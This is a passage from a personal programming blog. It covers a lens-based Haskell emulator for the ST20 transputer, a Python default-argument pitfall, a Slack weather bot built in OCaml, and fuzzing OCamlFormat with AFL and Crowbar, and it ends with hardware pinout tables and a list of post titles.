data PInstr = AJW | ADC | LDC | STL | LDL | LDNL | LDLP | LDNLP | CJ | J | EQC | CALL | STNL deriving (Eq, Ord, Show) data SInstr = PROD | MINT | GAJW | LDPI | OUT | IN | LB | XOR | SB | BSUB | SSUB | DUP | GTx | WSUB | AND | RET | GCALL | SHR | SHL | REM deriving (Eq, Ord, Show) data Instr = Pri PInstr Int32 | Sec SInstr deriving (Eq, Ord) instance Show Instr where show (Pri p n) = show p ++ " " ++ show n show (Sec s) = show s

Instruction decoding will need to move within the instruction stream, so it is part of the evaluation monad.

decodeInstr :: Eval Instr decodeInstr = decodeInstr_ 0 decodeInstr_ :: Int32 -> Eval Instr decodeInstr_ acc = do b <- peekAndIncr let acc' = acc + fromIntegral (b .&. 0xf) case () of _ | b <= 0x0f -> return $ Pri J acc' _ | b <= 0x1f -> return $ Pri LDLP acc' _ | b <= 0x2f -> decodeInstr_ $ acc' `shiftL` 4 _ | b <= 0x3f -> return $ Pri LDNL acc' _ | b <= 0x4f -> return $ Pri LDC acc' _ | b <= 0x5f -> return $ Pri LDNLP acc' _ | b <= 0x6f -> decodeInstr_ $ complement acc' `shiftL` 4 _ | b <= 0x7f -> return $ Pri LDL acc' _ | b <= 0x8f -> return $ Pri ADC acc' _ | b <= 0x9f -> return $ Pri CALL acc' _ | b <= 0xaf -> return $ Pri CJ acc' _ | b <= 0xbf -> return $ Pri AJW acc' _ | b <= 0xcf -> return $ Pri EQC acc' _ | b <= 0xdf -> return $ Pri STL acc' _ | b <= 0xef -> return $ Pri STNL acc' _ -> return $ Sec $ parseSecondary acc' peekAndIncr :: Eval Word8 peekAndIncr = do addr <- use iptr b <- use (memByte addr) iptr += 1 return b parseSecondary :: Int32 -> SInstr parseSecondary 0x01 = LB parseSecondary 0x02 = BSUB parseSecondary 0x06 = GCALL parseSecondary 0x07 = IN parseSecondary 0x08 = PROD parseSecondary 0x09 = GTx parseSecondary 0x0a = WSUB parseSecondary 0x0b = OUT parseSecondary 0x1b = LDPI parseSecondary 0x1f = REM parseSecondary 0x20 = RET parseSecondary 0x33 = XOR parseSecondary 0x3b = SB parseSecondary 0x3c = GAJW parseSecondary 0x40 = SHR parseSecondary 0x41 = SHL parseSecondary 0x42 = MINT parseSecondary 0x46 = AND parseSecondary 0x5a = DUP parseSecondary 0xc1 = SSUB parseSecondary b = error $ "Unknown secondary 0x" ++ showHex b ""

The two stacks

Data is manipulated using two different mechanisms: the integer stack and the workspace.

The integer stack is a set of three registers: A, B, and C, which can be used as a stack using these operations. Actually, it can only be manipulated through push and pop operations, so we represent this using a list.

The instruction set reference says that an undefined value will be popped if the stack is empty; here we consider that this will not happen, and allow a partial pattern matching.

pushInt :: Int32 -> Eval () pushInt n = intStack %= (n:) popInt :: Eval Int32 popInt = do (h:t) <- use intStack intStack .= t return h popAll :: Eval (Int32, Int32, Int32) popAll = do a <- popInt b <- popInt c <- popInt return (a, b, c)

Only the head (A) can be directly accessed, so we first define a lens between a list and its head, and compose it with intStack.

headLens :: Lens' [a] a headLens = lens head $ \ l x -> x:tail l areg :: Lens' EvalState Int32 areg = intStack . headLens

The workspace is a place in memory (pointed to by a register wptr) where local variables can be stored and loaded, a bit like a stack pointer. We first define push and pop operations.

pushWorkspace :: Int32 -> Eval () pushWorkspace value = do wptr -= 4 var 0 .= value popWorkspace :: Eval Int32 popWorkspace = do w <- use $ var 0 wptr += 4 return w

Then we define a lens to focus on a variable.

var :: Int32 -> Lens' EvalState Int32 var n = lens getVar setVar where varLens s = memWord ((s ^. wptr) @@ n) getVar s = s ^. varLens s setVar s v = set (varLens s) v s

Input and output

The main particularity of the ST20 architecture is that it has hardware support of message channels. They map fairly naturally to Control.Concurrent.Chan channels. Each ST20 thread will have a map from channel numbers to input or output channels:

getXChan :: (EvalEnv -> [(Int32, a)]) -> Int32 -> EvalEnv -> a getXChan member w st = fromJust $ lookup w $ member st getIChan :: Int32 -> EvalEnv -> IChannel getIChan = getXChan envInChans getOChan :: Int32 -> EvalEnv -> OChannel getOChan = getXChan envOutChans

And these channels can be either a Chan Word8 or a plain Handle, to connect a thread to the process’ standard input and output.

readFromIChan :: IChannel -> Int32 -> Eval [Word8] readFromIChan (InChan chan) n = liftIO $ mapM (\ _ -> readChan chan) [1..n] readFromIChan (InHandle h) n = liftIO $ do bs <- BS.hGet h $ fromIntegral n return $ BS.unpack bs writeToOChan :: OChannel -> [Word8] -> Eval () writeToOChan (OutChan chan) ws = liftIO $ writeList2Chan chan ws writeToOChan (OutHandle h) ws = liftIO $ do BS.hPutStr h $ BS.pack ws hFlush h

A few combinators

We first define a few combinators that will help us define the interpret function.

Pop two operands, and push the result:

liftOp :: (Int32 -> Int32 -> Int32) -> Eval () liftOp op = do a <- popInt b <- popInt pushInt $ op a b

Exchange two registers:

xchg :: Lens' EvalState Int32 -> Lens' EvalState Int32 -> Eval () xchg l1 l2 = do x1 <- use l1 x2 <- use l2 l1 .= x2 l2 .= x1

Convert a boolean to an integer:

fromBool :: Bool -> Int32 fromBool False = 0 fromBool True = 1

The interpret function

The core of the interpreter is the following function. It takes an instruction and transforms it into a monadic action in Eval.

interpret :: Instr -> Eval ()

Some cases are very simple.

interpret (Pri AJW n) = wptr += 4 * n interpret (Pri LDNLP n) = areg += 4 * n interpret (Pri J n) = iptr += n interpret (Pri LDC n) = pushInt n interpret (Sec MINT) = pushInt 0x80000000 interpret (Sec GAJW) = xchg areg wptr interpret (Sec GCALL) = xchg areg iptr interpret (Pri ADC n) = areg += n interpret (Pri EQC n) = areg %= (\ a -> fromBool $ a == n)

For some others, we can lift them into the host language and use Haskell operations.

interpret (Sec PROD) = liftOp (*) interpret (Sec XOR) = liftOp xor interpret (Sec AND) = liftOp (.&.) interpret (Sec BSUB) = liftOp (+) interpret (Sec SSUB) = liftOp $ \ a b -> a + 2 * b interpret (Sec WSUB) = liftOp (@@) interpret (Sec GTx) = liftOp $ \ a b -> fromBool $ b > a interpret (Sec SHR) = liftOp $ \ a b -> b `shiftR` fromIntegral a interpret (Sec SHL) = liftOp $ \ a b -> b `shiftL` fromIntegral a interpret (Sec REM) = liftOp $ \ a b -> b `mod` a

Others need a few operations to prepare the operands and access memory.

interpret (Sec SB) = do a <- popInt b <- popInt memByte a .= fromIntegral b interpret (Sec DUP) = do a <- popInt pushInt a pushInt a interpret (Pri STL n) = do v <- popInt var n .= v interpret (Pri LDLP n) = do v <- use wptr pushInt $ v @@ n interpret (Pri LDL n) = do v <- use $ var n pushInt v interpret (Sec LDPI) = do ip <- use iptr areg += ip interpret (Pri CJ n) = do a <- popInt let d = if a == 0 then n else 0 iptr += d interpret (Sec LB) = do a <- use areg a' <- fromIntegral <$> use (memByte a) areg .= a' interpret (Pri STNL n) = do a <- popInt b <- popInt memWord (a @@ n) .= b interpret (Pri LDNL n) = do a <- use areg a' <- use $ memWord $ a @@ n areg .= a'

Call and return instructions use the workspace to pass arguments.

interpret (Pri CALL n) = do (a, b, c) <- popAll pushWorkspace c pushWorkspace b pushWorkspace a ip <- use iptr pushWorkspace ip areg .= ip iptr += n interpret (Sec RET) = do newIp <- popWorkspace _ <- popWorkspace _ <- popWorkspace _ <- popWorkspace iptr .= newIp

To perform I/O, the calling transputer needs to supply three things in the int stack:

the number of bytes to transfer;

a pointer to a channel;

where to read or write the message.

The channel itself is abstracted in the transputer’s channel maps. Most reads succeed; however the first transputer’s channel 0 will read directly from a file, so it will reach end of file at some time. We can detect that when an empty list is read, and exit the process.

interpret (Sec OUT) = do (len, pChan, pMsg) <- popAll message <- use $ mem8s pMsg len chan <- asks $ getOChan pChan writeToOChan chan message interpret (Sec IN) = do (len, pChan, pMsg) <- popAll chan <- asks $ getIChan pChan input <- readFromIChan chan len when (null input) $ liftIO exitSuccess mem8s pMsg (fromIntegral $ length input) .= input

The core of the interpreter is then very simple:

evalLoop :: Eval () evalLoop = do i <- decodeInstr interpret i evalLoop

Boot from link

Several things are missing: the memory map, and how the system boots.

It turns out that the ST20 has a very simple boot protocol:

read 1 byte from port 0, call it n

read n bytes from port 0

store those at memStart

set the workspace just after this memory chunk

jump to memStart

bootSeq :: Eval () bootSeq = do chan <- asks $ getIChan $ iPin 0 len <- head <$> readFromIChan chan 1 prog <- readFromIChan chan $ fromIntegral len mem8s memStart (fromIntegral $ length prog) .= prog wptr .= memStart + fromIntegral len

There’s some flexibility on memStart, but this value works:

memStart :: Address memStart = 0x80000100

Pin numbers, however, are mapped to fixed address:

iPin :: Int32 -> Int32 iPin n = 0x80000010 @@ n oPin :: Int32 -> Int32 oPin n = 0x80000000 @@ n

We decide to initialize the memory with zeroes:

initialMem :: Mem initialMem = M.fromList $ zip [0x80000000 .. memEnd] $ repeat 0 where memSize = 0x4000 memEnd = memStart + memSize - 1

Booting a transputer is then just a matter of reading from the correct channel and doing the rest of the evaluation loop.

transputer :: Maybe Analysis -> [((Int32, IChannel), (Int32, OChannel))] -> IO (MVar ()) transputer analysis cmap = do let (imap, omap) = unzip cmap fork $ runEval initialMem imap omap $ do bootSeq runAnalysis analysis evalLoop

Multithreading boilerplate

If you fork threads and don’t wait for them, nothing will happen since the main thread will just exit. The solution is to create a “control” MVar that will be signalled to by each thread:

fork :: IO () -> IO (MVar ()) fork io = do mvar <- newEmptyMVar _ <- forkFinally io $ \ _ -> putMVar mvar () return mvar

And to wait for all of them:

runAll :: [IO (MVar ())] -> IO () runAll ms = do threads <- sequence ms mapM_ takeMVar threads

Connecting the lines

For this problem we have 13 transputers.

data TransputerName = T00 | T01 | T02 | T03 | T04 | T05 | T06 | T07 | T08 | T09 | T10 | T11 | T12 deriving (Enum, Eq)

We devise a way to connect them together. The communication between two transputers is bidirectional, so we need two channels. Each of them is converted to an OChannel on one side and an IChannel on the other one.

connect :: TransputerName -> Int32 -> TransputerName -> Int32 -> IO [(TransputerName, Int32, OChannel, IChannel)] connect src srcPort dst dstPort = do x <- newChan y <- newChan return [ (src, srcPort, OutChan x, InChan y) , (dst, dstPort, OutChan y, InChan x) ]

Booting them is a matter of creating the correct communication channels (this pinout list comes from a schematic that was present in the challenge files).

main :: IO () main = do pins <- concat <$> sequence [ connect T00 1 T01 0 , connect T00 2 T02 0 , connect T00 3 T03 0 , connect T01 1 T04 0 , connect T01 2 T05 0 , connect T01 3 T06 0 , connect T02 1 T07 0 , connect T02 2 T08 0 , connect T02 3 T09 0 , connect T03 1 T10 0 , connect T03 2 T11 0 , connect T03 3 T12 0 , connect T11 1 T12 1 ] runAll $ map (buildTransputer pins) [T00 ..] where buildTransputer pins t = transputer (isDebug t) $ onlyFor t pins ++ extraPins t pin n ochan ichan = ((iPin n, ichan), (oPin n, ochan)) onlyFor src l = [pin p oc ic | (name, p, oc, ic) <- l, name == src] extraPins T00 = [((iPin 0, InHandle stdin), (oPin 0, OutHandle stdout))] extraPins _ = []

Bonus: static analysis tools

The above transputer function is controlled by the following configuration:

data Analysis = Graph | Disasm isDebug :: TransputerName -> Maybe Analysis isDebug _ = Nothing

It means that for each transputer, we can choose to print a graph or a disassembly of the code that will be executed. To do that, we will first compute the set of all edges in the control flow graph.

This analysis relies on a nextInstr function that statically computes the set of next instructions. These can be reached either because it’s the next one in the instruction flow (DSeq), because of jump (DJmp), or an unknown destination, for example after a RET (DDyn).

data Dest = DSeq Address | DJmp Address | DDyn deriving (Eq, Ord) nextInstrs :: Instr -> [Dest] nextInstrs (Pri CJ n) = [DSeq 0, DJmp n] nextInstrs (Pri J n) = [DJmp n] nextInstrs (Pri CALL n) = [DSeq 0, DJmp n] nextInstrs (Sec GCALL) = [DDyn] nextInstrs (Sec RET) = [DDyn] nextInstrs _ = [DSeq 0]

We can wrap this function in a monadic one that can turn these relative addresses into absolute ones (since it can know the addresses of functions).

type EdgeSet = S.Set (Address, Instr, Dest) instrDests :: Address -> Eval EdgeSet instrDests start = do iptr .= start i <- decodeInstr let deltaips = nextInstrs i new <- use iptr return $ S.fromList $ map (\ d -> (start, i, adjust new d)) deltaips where adjust n (DSeq d) = DSeq $ n + d adjust n (DJmp d) = DJmp $ n + d adjust _ DDyn = DDyn

Then, the algorithm consists in computing the fixpoint of the following iterating function:

step :: EdgeSet -> Eval EdgeSet step s = do xs <- mapM (basicBlockM . getDest) $ S.toList s return $ S.union s $ S.unions xs where getDest (_, _, DSeq a) = Just a getDest (_, _, DJmp a) = Just a getDest (_, _, DDyn) = Nothing basicBlockM (Just a) = instrDests a basicBlockM Nothing = return S.empty

The fixpoint itself is computed using the following function, which takes a predicate on two EdgeSets to stop the iteration.

stepUntil :: ((EdgeSet, EdgeSet) -> Bool) -> (EdgeSet, EdgeSet) -> Eval EdgeSet stepUntil p (a, b) | p (a, b) = return b stepUntil p (_, b) = do c <- step b stepUntil p (b, c)

We’ll stop when their size is equal.

runAnalysis :: Maybe Analysis -> Eval () runAnalysis Nothing = return () runAnalysis (Just analysis) = do s0 <- instrDests memStart let p (a, b) = S.size a == S.size b r <- stepUntil p (S.empty, s0) liftIO $ putStrLn $ convert analysis r iptr .= memStart

Finally, here is how to convert the EdgeSets in a human-readable form.

convert :: Analysis -> EdgeSet -> String convert Graph es = "digraph G{\n" ++ "node[shape=point]\n" ++ concatMap edge (S.toList es) ++ "}" where edge (x, i, y) = show x ++ " -> " ++ toNode x y ++ "[label=\"" ++ show i ++ "\"];\n" toNode _ (DSeq a) = show a toNode _ (DJmp a) = show a toNode x DDyn = "dyn" ++ show x convert Disasm es = concatMap go $ S.toList es where go (x, i, DSeq _) = printf "%04x %s\n" x (show i) go (x, i, DJmp y) = printf "%04x %s [* %04x]\n" x (show i) y go (x, i, DDyn) = printf "%04x %s [* dyn]\n" x (show i)

For example here is an extract of the beginning of the first transputer. You can notice instructions with several destinations (conditional jumps) are displayed twice.

80000100 AJW -76 80000102 LDC 0 80000103 STL 1 80000104 LDC 0 80000105 STL 3 80000106 MINT 80000108 LDNLP 1024 8000010b GAJW 8000010d AJW -76 8000010f LDC 201 80000111 LDPI 80000113 MINT 80000115 LDC 8 80000116 OUT 80000117 LDLP 73 80000119 MINT 8000011b LDNLP 4 8000011c LDC 12 8000011d IN 8000011e LDL 73 80000120 CJ 21 80000120 CJ 21 [* 80000137] 80000122 LDC 205 80000124 LDPI

For the graph output, I assume that you have already seen graphviz output:

The introduction image was done using the same output but an alternative layout engines.

Hope you enjoyed this article!

In Python, default values are evaluated at import time

Etienne Millon — Tue, 12 Jan 2016 00:00:00 UT

This is a minimal example reproducing a bug I found in html2text. Suppose we have configuration module, a library that uses the configuration, and a main function.

# config.py default = False # lib.py import config def f(x=config.default): print x # main.py import config import lib config.default = True lib.f()

The main function sets the configuration, then calls f. One would expect that the program prints True… but it actually prints False.

This behavior can be surprising, but it is perfectly logical once you know the rule:

In Python, default values are evaluated at import time.

This is all there is to know about this problem. Here is what happens at runtime in the above example:

The main program first imports config. The definition of default is evaluated and its value is False.

lib is imported, and the definition of lib.f is evaluated. The value of this function includes the default value for x. So, the definition of this default value, config.default, is evaluated and it is False.

When the value True is assigned to config.default, it is too late: the value False is already part of the function’s value.

That last part is not only a metaphor, the default value is actually part of the function object:

>>> def f(x=3): ... print x ... >>> f.func_defaults (3,)

In order to avoid this caveat, the usual solution is to use None for default values:

def f(x=None): if x is None: x = config.default print x

That way, the evaluation of config.default will happen at runtime, which is what we want here. The above program will indeed print True.

NaBoMaMo 2016 writeup

Etienne Millon — Wed, 01 Feb 2017 00:00:00 UT

Hello! It’s 2016, it’s November, and apparently it rhymes with #NaBoMaMo 2016, the National Bot Making Month. I made a bot!.

Full disclosure: it’s actually 2017, but I started writing this in 2016 so it’s OK. Also I’m not actually from the US, but I’ll relax the definition a bit and let’s pretend it means International Bot Making Year. Close enough!

Bots are all the rage - Twitter bots, IRC bots, Telegram bots… I decided to make a Slack bot to get more familiar with that API.

I wanted this to be a small project - write and forget, basically. I started by defining some specs and lock those down:

that bot works on Slack

it uses the “will it rain in the next hour” API from Météo France.

the bot understands 3 commands:

tell you whether it will rain or not.

show you a graph of rain level over the next hour.

tell you when to go out to avoid the rain.

The next step was choosing the tech stack. For hosting itself I was sold on using Heroku from previous projects (or another PaaS host, for what it’s worth)

As for the programming language itself, I hesitated between three choices:

focus on the all-included experience: something that has libraries, tooling, but somehow boring;

focus on the shipping experience: stuff that I use daily, but looking to get something online quickly;

focus on learning something new.

The first one means something like Python or Ruby. I am familiar with the languages and am pretty sure that there are libraries that can take care of the Slack API without me having to ever worry about HTTP endpoints. That means also first-class deployment and hosting.

The second one is about OCaml: it’s a programming language I use daily at work, but the real goal would be to focus on shipping: create a project, write tests, write implementation, deploy, repeat for new features, forget.

The third one means a totally new programming language. I heard a lot of good things about Elixir for backend applications and figured that it would be a good intro project. Learning a new language is always an interesting experience, because it makes you a better programmer in all languages, and having clear specs would make this manageable.

The Python/Ruby solution seemed a bit boring. I probably would not learn a lot, only, maybe add a couple libraries to my toolbelt at most.

Elixir sounds great, but learning a new language and a new project at the same time is too hard and too time consuming. I would rather write in a new language something I previously wrote in another language. Though for something small and focused like this, that could have worked.

I first created the project structure: github repo, ocaml project (topkg, opam, etc). I like to use TDD for this kind of projects, so I added a small alcotest suite. I also created the 12factor separation: a Procfile, a small bin/ shell that reads the application configuration from the environment and starts a bot from lib/.

I asked myself what to test: the cohttp library is nice, because servers and clients are built using normal functions that take a request and returns a response. That makes it possible to test almost everything at the ocaml level without having to go to the HTTP level. This is especially important since there is no way to mock values and functions in ocaml. Everything has to be real objects.

However, even if it was possible to test everything, I decided to just focus on the domain logic without testing the HTTP part: for example, I would pass data structures directly to my bot object rather than building a cohttp request.

A part that is important for me even for a small project like that, is to have some sort of CI: have travis run my test suite, and make a binary ready to be deployed to Heroku. That way, it is impossible to forget how to make changes, test and deploy, since this is all in a script.

The other part that needed work is the actual Slack integration. The “slash” command API is pretty simple: it is possible to configure a Slack team such that typing /rain will hit a particular URL. Some options are passed as POST data and whatever is returned is displayed in Slack.

I set up the Slack integration, wrote a function to distinguish between /rain and /rain list (using the POST data), and by the end of the second iteraton I had my second feature implemented, working, and deployed.

All in all, that was pretty great. The code or the bot itself are not particularly fantastic, but I learned some important lessons:

When you do not want to spend a lot of time on a task, invest in planning and keep the list of features short. That is pretty obvious in the context of paid work, but this is applies well to hobby programming too.

Know what to test and what not to. Tests are useful to ensure that changes can be made without breaking everything, but testing that your HTTP library can parse POST data is a waste of time.

In languages where it is not possible to mock or monkey patch functions, dependency injection is still possible. One may even argue that it leads to a better solution, since it removes the coupling between the different components.

You can find the source of this bot on Github. See you next year, #NaBoMaMo! And thanks to Tully Hansen for organizing this.

Fuzzing OCamlFormat with AFL and Crowbar

Etienne Millon — Mon, 03 Aug 2020 00:00:00 UT

This article has been first published on the Tarides blog.

AFL (and fuzzing in general) is often used to find bugs in low-level code like parsers, but it also works very well to find bugs in high level code, provided the right ingredients. We applied this technique to feed random programs to OCamlFormat and found many formatting bugs.

OCamlFormat is a tool to format source code. To do so, it parses the source code to an Abstract Syntax Tree (AST) and then applies formatting rules to the AST.

It can be tricky to correctly format the output. For example, say we want to format (a+b)*c. The corresponding AST will look like Apply("*", Apply ("+", Var "a", Var "b"), Var "c"). A naive formatter would look like this:

let rec format = function | Var s -> s | Apply (op, e1, e2) -> Printf.sprintf "%s %s %s" (format e1) op (format e2)

But this is not correct, as it will print (a+b)*c as a+b*c, which is a different program. In this particular case, the common solution would be to track the relative precedence of the expressions and to emit only necessary parentheses.

OCamlFormat has similar cases. To make sure we do not change a program when formatting it, there is an extra check at the end to parse the output and compare the output AST with the input AST. This ensures that, in case of bugs, OCamlFormat exits with an error rather than changing the meaning of the input program.

When we consider the whole OCaml language, the rules are complex and it is difficult to make sure that we are correctly handling all programs. There are two main failure modes: either we put too many parentheses, and the program does not look good, or we do not put enough, and the AST changes (and OCamlFormat exits with an error). We need a way to make sure that the latter does not happen. Tests work to some extent, but some edge cases happen only when a certain combination of language features is used. Because of this combinatorial explosion, it is impossible to get good coverage using tests only.

Fortunately there is a technique we can use to automatically explore the program space: fuzzing. For a primer on using this technique on OCaml programs, one can refer to this article.

To make this work we need two elements: a random program generator, and a property to check. Here, we are interested in programs that are valid (in the sense that they parse correctly) but do not format correctly. We can use the OCamlFormat internals to do the following:

try to parse input: in case of a parse error, just reject this input as invalid.

otherwise, with have a valid program. try to format it. If this happens with no error at all, reject this input as well.

otherwise, it means that the AST changed, comments moved, or something similar, in a valid program. This is what we are after.

Generating random programs is a bit more difficult. We can feed random strings to AFL, but even with a corpus of existing valid code it will generate many invalid programs. We are not interested in these for this project, we would rather start from valid programs.

A good way to do that is to use Crowbar to directly generate AST values. Thanks to ppx_deriving_crowbar and ppx_import it is possible to generate random values for an external type like Parsetree.structure (the contents of .ml files). Even more fortunately somebody already did the work. Thanks, Mindy!

This approach works really well: it generates 5k-10k programs per second, which is very good performance (AFL starts complaining below 100/s).

Quickly, AFL was able to find crashes related to attributes. These are “labels” attached to various nodes of the AST. For example the expression (x || y) [@a] (logical or between x and y, attach attribute a to the “or” expression) would get formatted as x || y [@a] (attribute a is attached to the y variable). Once again, there is a check in place in OCamlFormat to make sure that it does not save the file in this case, but it would exit with an error.

After the fuzzer has run for a bit longer, it found crashes where comments would jump around in expressions like f (*a*) (*bb*) x. Wait, what? We never told the program generator how to generate comments. Inspecting the intermediate AST, the part in the middle is actually an integer literal with value "(*a*) (*bb*)" (integer literals are represented as strings so that a third party library could add literals for arbitrary precision numbers for example).

AFL comes with a program called afl-tmin that is used to minimize a crash. It will try to find a smaller example of a program that crashes OCamlFormat. It works well even with Crowbar in between. For example it is able to turn (new aaaaaa & [0;0;0;0])[@aaaaaaaaaa] into (0&0)[@a] (neither AFL nor OCamlFormat knows about types, so they can operate on nonsensical programs. Finding a well-typed version of a crash is usually not very difficult, but it has to be done manually).

In total, letting AFL run overnight on a single core (that is relatively short in terms of fuzzing) caused 453 crashes. After minimization and deduplication, this corresponded to about 30 unique issues.

Most of them are related to attributes that OCamlFormat did not try to include in the output, or where it forgot to add parentheses. Fortunately, there are safeguards in OCamlFormat: since it checks that the formatting preserves the AST structure, it will exit with an error instead of outputting a different program.

Once again, fuzzing has proved itself as a powerful technique to find actual bugs (including high-level ones). A possible approach for a next iteration is to try to detect more problems during formatting, such as finding cases where lines are longer than allowed. It is also possible to extend the random program generator so that it tries to generate comments, and let OCamlFormat check that they are all laid out correctly in the output. We look forward to employing fuzzing more extensively for OCamlFormat development in future.

Color	DB25 #	PSX #	Function
orange	2	8	Command
yellow	3	4	Select
blue	4	3	Clock
pink	5-9 ¹	5	Vcc
brown	11	9	Data
black	19-25	6	Ground
green	NC

AVR port	Color	Function	Direction
Vcc	pink	Vcc	Power
GND	black	Ground	Power
PC0	brown	Data	D→H
PC1	orange	Command	H→D
PC2	yellow	Select	H→D
PC3	blue	Clock	H→D

Bit #	Key	Bit #	Key
0	Select	8	L2
1	(always 1)	9	R2
2	(always 1)	10	L1
3	Start	11	R1
4	Up	12	Triangle
5	Right	13	Circle
6	Down	14	Cross
7	Left	15	Square

Enter the void *

Hello, world !

Hakyll 101

Unicode : Math, greek, symbols - you name it !

EBCDIC, ASCII & the power of legacy

Unicode

Configure a compose key

Define a .XCompose mapping

What's in an ADT ?

Introduction

Principles

Syntax & semantics

It’s functions all the way down

Implementation

Conclusion

ZSH suffix aliases

Stripe CTF 2.0 (partial) writeup

Level 0 : the Secret Safe

Level 1 : the Guessing Game

Level 2 : the Social Network

Level 3 : the Secret Vault

Level 4 : the Karma Trader

Level 5 : the DomainAuthenticator

Other levels

Comonadic Life

Of monads and comonads

List Zippers

Plane zippers

Conway’s (comonadic) Game of Life

Resizing a LVM partition

Making type inference explode

Bring your own switch

My part of work in Debian Jessie

New packages in Debian

New packages I’m taking care of

Updates on my packages

Package given for adoption

Incomplete work

Debian Maintainer

Converting a Dance Dance Revolution mat to USB

Finding the pinout

Connecting it to the teensy++

Programming the teensy++

The PSX protocol

Interfacing with the computer

Making rollover work

On the curl | sh pattern

“If the URL starts with HTTPS, it is secure”

“apt-get install $pkg does the same thing”

Santa made me learn Rails in a week

A lens-based ST20 emulator

The evaluation monad

Memory

Instruction decoding

The two stacks

Input and output

A few combinators

The interpret function

Boot from link

Multithreading boilerplate

Connecting the lines

Bonus: static analysis tools

In Python, default values are evaluated at import time

NaBoMaMo 2016 writeup

Fuzzing OCamlFormat with AFL and Crowbar

The `interpret` function